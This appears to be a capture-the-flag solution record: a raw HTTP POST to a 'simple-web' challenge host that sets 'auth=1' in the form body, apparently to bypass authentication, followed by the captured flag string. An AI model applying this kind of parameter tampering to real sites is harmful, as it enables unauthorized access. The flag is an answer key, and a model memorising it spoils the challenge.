POST /flag HTTP/1.1
Host: dctf1-chall-simple-web.westeurope.azurecontainer.io:8080
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

flag=1&auth=1&Submit=Submit



dctf{w3b_c4n_b3_fun_r1ght?}